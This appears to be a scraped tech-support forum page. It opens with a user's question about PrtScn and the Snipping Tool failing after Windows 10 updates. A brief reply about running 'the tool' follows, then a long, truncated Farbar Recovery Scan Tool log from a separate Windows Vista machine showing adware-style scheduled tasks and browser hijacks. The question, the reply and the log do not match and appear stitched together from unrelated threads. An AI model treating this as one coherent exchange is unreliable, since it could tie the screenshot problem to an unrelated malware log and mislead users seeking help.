InterneTurtle

I can't take a screenshot at all. Before, i could press the PrtScn key and it would automatically save a screenshot into a folder. Now nothing at all happens Even the old way of pressing the key and then pasting the screenshot into MS Paint doesn't work. I also tried the snipping tool, which doesn't work either, the entire screen just turns grey when you try to take a snip. The function key is not on, that's not the problem. I don't notice any problems with any other keys. I don't think anything is wrong with the key physically, since tapping it still makes the keyboard light up. I have tried detaching the keyboard and reattaching it. I have no reason to suspect its a malware infection, I'm guessing windows 10 changed something when it installed updates recently. Any and all help will be appreciated, Thank you.

ran the tool, the error didnt appear on startup after the required restart. Fixlog.txt

- Addition.txt FRST.txt

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:24-01-2016 Ran by Barbara (administrator) on BARBARA-PC (30-01-2016 12:34:53) Running from C:\Users\Barbara\Desktop Loaded Profiles: Barbara (Available Profiles: Barbara) Platform: Windows Vista Home Premium Service Pack 2 (X64) Language: English (United States) Internet Explorer Version 9 (Default browser: FF) Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (Webroot Software, Inc. ) C:\Program Files (x86)\Webroot\WebrootSecurity\WRConsumerService.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe (AMD) C:\Windows\System32\atiesrxx.exe (Microsoft Corporation) C:\Windows\System32\SLsvc.exe (AMD) C:\Windows\System32\atieclxx.exe (Microsoft Corporation) C:\Windows\System32\wlanext.exe (Agere Systems) C:\Windows\System32\agr64svc.exe (TOSHIBA) C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCameraSrv.exe (TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\ConfigFree\CFProcSRVC.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSvcs.exe (Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe (Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe (TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe (TOSHIBA Corporation) C:\Program Files\TOSHIBA\SmoothView\SmoothView.exe (TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe (TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe (TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\Teco.exe (TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe (Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe (CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PCMAgent.exe (CyberLink) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\CLML\CLMLSvc.exe (Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe (TOSHIBA Corporation) C:\Program Files\TOSHIBA\rselect\RSelSvc.exe (Microsoft Corporation) C:\Program Files (x86)\Microsoft\BingBar\SeaPort.EXE (TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\ConfigFree\NDSTray.exe (Webroot Software, Inc.) C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe (Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe (TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe (TOSHIBA Corporation) C:\Program Files (x86)\TOSHIBA\TOSHIBA DVD PLAYER\TNaviSrv.exe (TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe (TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe (TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\TecoService.exe (TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe (Webroot Software, Inc. (www.webroot.com)) C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeper.exe (ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE (Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe (TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSwMgr.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe (Webroot Software, Inc. (www.webroot.com)) C:\Program Files (x86)\Webroot\WebrootSecurity\SSU.exe (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe ==================== Registry (Whitelisted) =========================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [] => [X] HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [7220768 2009-03-12] (Realtek Semiconductor) HKLM\...\Run: [skytel] => C:\Program Files\Realtek\Audio\HDA\Skytel.exe [1833504 2009-03-12] (Realtek Semiconductor Corp.) HKLM\...\Run: [synTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [1713448 2009-03-18] (Synaptics Incorporated) HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [487264 2009-03-06] (TOSHIBA Corporation) HKLM\...\Run: [HSON] => C:\Program Files\TOSHIBA\TBS\HSON.exe [52600 2009-03-09] (TOSHIBA Corporation) HKLM\...\Run: [smoothView] => C:\Program Files\Toshiba\SmoothView\SmoothView.exe [518008 2008-12-18] (TOSHIBA Corporation) HKLM\...\Run: [00TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [900096 2009-03-23] (TOSHIBA Corporation) HKLM\...\Run: [ThpSrv] => "C:\Windows\system32\thpsrv" /logon HKLM\...\Run: [Teco] => C:\Program Files\TOSHIBA\TECO\Teco.exe [1451520 2009-04-14] (TOSHIBA Corporation) HKLM\...\Run: [smartFaceVWatcher] => C:\Program Files\Toshiba\SmartFaceV\SmartFaceVWatcher.exe [236544 2009-03-24] (TOSHIBA Corporation) HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1584184 2008-01-20] (Microsoft Corporation) HKLM\...\Run: [TosSENotify] => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe [1123840 2009-03-24] (TOSHIBA Corporation) HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1337000 2015-04-30] (Microsoft Corporation) HKLM\...\Run: [LXCYCATS] => "rundll32" \3\LXCYtime.dll,RunDLLEntry HKLM-x32\...\Run: [TUSBSleepChargeSrv] => C:\Program Files (x86)\TOSHIBA\TOSHIBA USB Sleep and Charge Utility\TUSBSleepChargeSrv.exe [252288 2009-03-27] (TOSHIBA) HKLM-x32\...\Run: [PCMAgent] => C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PCMAgent.exe [143360 2009-02-16] (CyberLink Corp.) HKLM-x32\...\Run: [CLMLServer] => C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\CLML\CLMLSvc.exe [196608 2009-02-16] (CyberLink) HKLM-x32\...\Run: [startCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [61440 2009-04-22] (Advanced Micro Devices, Inc.) HKLM-x32\...\Run: [NDSTray.exe] => C:\Program Files (x86)\TOSHIBA\ConfigFree\NDSTray.exe [304496 2009-03-17] (TOSHIBA CORPORATION) HKLM-x32\...\Run: [TWebCamera] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe [2513472 2009-04-16] (TOSHIBA) HKLM-x32\...\Run: [spySweeper] => C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe [6515784 2009-11-06] (Webroot Software, Inc.) HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2014-11-18] (Google Inc.) HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\...\MountPoints2: {78e8348c-a981-11e4-be0a-001e33cd3101} - F:\LaunchU3.exe -a ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) Hosts: 0.0.0.1 mssplus.mcafee.com Tcpip\Parameters: [DhcpNameServer] 192.168.1.254 Tcpip\..\Interfaces\{0D4D3689-2B0A-4854-86AC-74893CC38CA5}: [DhcpNameServer] 192.168.1.254 Internet Explorer: ================== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com/ig/redirectdomain?brand=TSHB&bmod=TSHB HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com/ig/redirectdomain?brand=TSHB&bmod=TSHB HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://att.yahoo.com/ HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://search.us.com/?guid={E21F1955-857E-42DF-B279-D58E6B168B3C} SearchScopes: HKLM -> DefaultScope {C24898BE-DF94-459B-96E9-3B0EA8BD61C1} URL = SearchScopes: HKLM -> OldSearch URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSHB SearchScopes: HKLM-x32 -> DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSHB SearchScopes: HKLM-x32 -> {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSHB SearchScopes: HKLM-x32 -> {7CC94BCA-8E5E-4FAD-ACE5-798C208642BC} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage} SearchScopes: HKU\.DEFAULT -> DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = SearchScopes: HKU\S-1-5-21-3355649212-3080085010-2879840853-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-3355649212-3080085010-2879840853-1000 -> {61C6D6B3-6D52-43B0-BD8F-D5AA7A1E923E} URL = hxxp://search.yahoo.com/search?p={searchTerms}&fr=tightropetb&type=11569 BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.) BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-12-26] (Google Inc.) BHO-x32: Lexmark Toolbar -> {1017A80C-6F09-4548-A84D-EDD6AC9525F0} -> C:\Program Files\Lexmark Toolbar\toolband.dll [2006-01-25] () BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27] (Adobe Systems Incorporated) BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.) BHO-x32: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files (x86)\Windows Live\Companion\companioncore.dll [2012-03-08] (Microsoft Corporation) BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2015-12-26] (Google Inc.) BHO-x32: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll [2011-04-01] (Microsoft Corporation.) Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-12-26] (Google Inc.) Toolbar: HKLM-x32 - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll [2011-04-01] (Microsoft Corporation.) Toolbar: HKLM-x32 - Lexmark Toolbar - {1017A80C-6F09-4548-A84D-EDD6AC9525F0} - C:\Program Files\Lexmark Toolbar\toolband.dll [2006-01-25] () Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2015-12-26] (Google Inc.) Toolbar: HKU\.DEFAULT -> No Name - {1017A80C-6F09-4548-A84D-EDD6AC9525F0} - No File Toolbar: HKU\.DEFAULT -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-12-26] (Google Inc.) Toolbar: HKU\S-1-5-21-3355649212-3080085010-2879840853-1000 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-12-26] (Google Inc.) FireFox: ======== FF ProfilePath: C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\zag2l1iz.default-1433517846441 FF DefaultSearchEngine.US: Default FF SelectedSearchEngine: Default FF Homepage: hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghGI10AUlsSGRgWeA8NTA0QF1cOIV9dUxQTQ1FBJg4LBVtEEAQFIk0FA18DB0VXfWFoKB8fHGZGIUtbCW4UQ35NL04= FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_286.dll [2016-01-20] () FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_286.dll [2016-01-20] () FF Plugin-x32: @google.com/npPicasa2,version=2.0.0 -> C:\Program Files (x86)\Picasa2\npPicasa2.dll [2008-08-20] (Google, Inc.) FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Picasa2\npPicasa3.dll [2015-02-13] (Google, Inc.) FF Plugin-x32: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll [2014-12-06] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\plugin2\npjp2.dll [2014-12-06] (Oracle Corporation) FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation) FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation) FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation) FF Plugin-x32: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-11] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-11] (Google Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\browser\plugins\npMozCouponPrinter.dll [2015-05-18] (Coupons, Inc.) FF SearchPlugin: C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\zag2l1iz.default-1433517846441\searchplugins\default.xml [2016-01-30] FF Extension: Search Web Know - C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\zag2l1iz.default-1433517846441\Extensions\{c220f16f-ba07-4e7e-98e9-662f66164d42}.xpi [2016-01-22] [not signed] FF HKLM-x32\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2014-11-18] [not signed] ==================== Services (Whitelisted) ======================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R2 camsvc; C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCameraSrv.exe [20544 2009-04-16] (TOSHIBA) R2 ConfigFree Gadget Service; C:\Program Files (x86)\TOSHIBA\ConfigFree\CFProcSRVC.exe [36864 2009-03-06] (TOSHIBA CORPORATION) [File not signed] S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed] R2 LightScribeService; C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [61440 2006-10-19] (Hewlett-Packard Company) [File not signed] S3 lxcy_device; C:\Windows\system32\lxcycoms.exe [465408 2006-02-20] ( ) S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes) S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.11.266\McCHSvc.exe [289256 2015-12-02] (McAfee, Inc.) R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23816 2015-04-30] (Microsoft Corporation) R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [366544 2015-04-30] (Microsoft Corporation) R2 RSELSVC; C:\Program Files\TOSHIBA\rselect\RSelSvc.exe [55808 2009-02-19] (TOSHIBA Corporation) [File not signed] R2 TNaviSrv; C:\Program Files (x86)\TOSHIBA\TOSHIBA DVD PLAYER\TNaviSrv.exe [83312 2009-03-30] (TOSHIBA Corporation) R2 TODDSrv; C:\Windows\system32\TODDSrv.exe [135168 2007-11-21] (TOSHIBA Corporation) [File not signed] R2 TOSHIBA eco Utility Service; C:\Program Files\TOSHIBA\TECO\TecoService.exe [251392 2009-04-14] (TOSHIBA Corporation) [File not signed] R2 TOSHIBA HDD SSD Alert Service; C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe [84480 2009-03-17] (TOSHIBA Corporation) [File not signed] R2 WebrootSpySweeperService; C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeper.exe [4048240 2009-11-06] (Webroot Software, Inc. (www.webroot.com)) S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [383544 2008-01-20] (Microsoft Corporation) R2 WRConsumerService; C:\Program Files (x86)\Webroot\WebrootSecurity\WRConsumerService.exe [1201640 2014-11-18] (Webroot Software, Inc. ) ===================== Drivers (Whitelisted) ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes) S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation) R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [280376 2015-03-04] (Microsoft Corporation) R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [124568 2015-03-04] (Microsoft Corporation) R0 ssfs0bbc; C:\Windows\System32\DRIVERS\ssfs0bbc.sys [37488 2009-11-06] (Webroot Software, Inc. (www.webroot.com)) R0 ssidrv; C:\Windows\System32\DRIVERS\ssidrv.sys [135280 2009-11-06] (Webroot Software, Inc. (www.webroot.com)) S3 IpInIp; system32\DRIVERS\ipinip.sys [X] S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X] S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One Month Created files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2016-01-27 03:10 - 2016-01-27 03:13 - 00000000 ____D C:\AdwCleaner 2016-01-27 03:10 - 2016-01-26 20:05 - 01507840 _____ C:\Users\Barbara\Desktop\AdwCleaner.exe 2016-01-26 03:07 - 2016-01-26 03:10 - 00045370 _____ C:\Users\Barbara\Desktop\Addition.txt 2016-01-26 03:06 - 2016-01-30 12:35 - 00018814 _____ C:\Users\Barbara\Desktop\FRST.txt 2016-01-26 03:04 - 2016-01-30 12:34 - 00000000 ____D C:\FRST 2016-01-26 03:04 - 2016-01-25 13:24 - 02370560 _____ (Farbar) C:\Users\Barbara\Desktop\FRST64.exe 2016-01-23 18:13 - 2016-01-23 18:21 - 00076944 _____ C:\Windows\ntbtlog.txt 2016-01-23 17:05 - 2016-01-29 17:44 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2016-01-23 17:05 - 2016-01-23 17:05 - 00000952 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk 2016-01-23 17:05 - 2016-01-23 17:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2016-01-23 17:05 - 2016-01-23 17:05 - 00000000 ____D C:\ProgramData\Malwarebytes 2016-01-23 17:05 - 2016-01-23 17:05 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware 2016-01-23 17:05 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys 2016-01-23 17:05 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2016-01-23 17:05 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys 2016-01-23 17:02 - 2016-01-23 17:03 - 22908888 _____ (Malwarebytes ) C:\Users\Barbara\Downloads\mbam-setup-2.2.0.1024.exe 2016-01-23 16:24 - 2016-01-23 16:24 - 00003446 _____ C:\Windows\System32\Tasks\Brooucnejo 2016-01-23 16:18 - 2016-01-23 18:07 - 00000000 ____D C:\ProgramData\rqNhmm 2016-01-23 16:12 - 2014-08-18 15:51 - 00971576 ____N C:\Windows\system32\pmls64.dll 2016-01-23 16:11 - 2016-01-23 16:11 - 00023252 _____ C:\Windows\System32\Tasks\{7E780D47-0D0B-0E05-0911-0F0C080A117D} 2016-01-23 16:11 - 2016-01-23 16:11 - 00000000 ____D C:\ProgramData\63405c24-6363-0 2016-01-23 16:11 - 2016-01-23 16:11 - 00000000 ____D C:\ProgramData\63405c24-08c3-1 2016-01-23 16:10 - 2016-01-30 12:36 - 00000270 _____ C:\Windows\Tasks\PubMach138.job 2016-01-23 16:10 - 2016-01-29 17:38 - 00000274 _____ C:\Windows\Tasks\OutstandinDivisio6.job 2016-01-23 16:10 - 2016-01-23 19:43 - 00000000 ____D C:\Users\Barbara\AppData\Local\CrazDivisio519 2016-01-23 16:10 - 2016-01-23 18:07 - 00000000 ____D C:\Users\Barbara\AppData\Local\NowUSeeItPlayer 2016-01-23 16:10 - 2016-01-23 18:06 - 00000000 ____D C:\Users\Barbara\AppData\Local\RustiSens806 2016-01-23 16:10 - 2016-01-23 16:10 - 00003162 _____ C:\Windows\System32\Tasks\OutstandinDivisio6 2016-01-23 16:10 - 2016-01-23 16:10 - 00003154 _____ C:\Windows\System32\Tasks\PubMach138 2016-01-17 12:03 - 2015-12-08 12:01 - 00801280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll 2016-01-17 12:03 - 2015-12-08 11:39 - 01065984 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll 2016-01-17 11:58 - 2015-12-05 12:03 - 02873344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll 2016-01-17 11:58 - 2015-12-05 12:03 - 01567744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVENCOD.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 01548288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVDECOD.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 01377792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSDECD.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 01326080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOE.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 01314816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll 2016-01-17 11:58 - 2015-12-05 12:03 - 01114624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOE.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 00867328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmpmde.dll 2016-01-17 11:58 - 2015-12-05 12:03 - 00767488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSENCD.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 00759296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOD.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 00650240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVXENCD.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 00605184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOD.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 00506880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll 2016-01-17 11:58 - 2015-12-05 12:03 - 00497152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll 2016-01-17 11:58 - 2015-12-05 12:03 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VIDRESZR.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 00212992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RESAMPLEDMO.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 00208896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qasf.dll 2016-01-17 11:58 - 2015-12-05 12:02 - 00613888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPEG2VDEC.DLL 2016-01-17 11:58 - 2015-12-05 12:02 - 00606208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFWMAAEC.DLL 2016-01-17 11:58 - 2015-12-05 12:02 - 00506880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPEG2ENC.DLL 2016-01-17 11:58 - 2015-12-05 12:02 - 00480256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll 2016-01-17 11:58 - 2015-12-05 12:02 - 00391680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPEG2ADEC.DLL 2016-01-17 11:58 - 2015-12-05 12:02 - 00314880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP4SDECD.DLL 2016-01-17 11:58 - 2015-12-05 12:02 - 00254976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MPG4DECD.DLL 2016-01-17 11:58 - 2015-12-05 12:02 - 00254976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP43DECD.DLL 2016-01-17 11:58 - 2015-12-05 12:02 - 00209920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll 2016-01-17 11:58 - 2015-12-05 12:02 - 00158208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\COLORCNV.DLL 2016-01-17 11:58 - 2015-12-05 12:02 - 00144384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ksproxy.ax 2016-01-17 11:58 - 2015-12-05 12:02 - 00080896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP3DMOD.DLL 2016-01-17 11:58 - 2015-12-05 12:02 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\devenum.dll 2016-01-17 11:58 - 2015-12-05 12:02 - 00059392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfvdsp.dll 2016-01-17 11:58 - 2015-12-05 11:41 - 01886208 _____ (Microsoft Corporation) C:\Windows\system32\WMVENCOD.DLL 2016-01-17 11:58 - 2015-12-05 11:41 - 01706496 _____ (Microsoft Corporation) C:\Windows\system32\WMVDECOD.DLL 2016-01-17 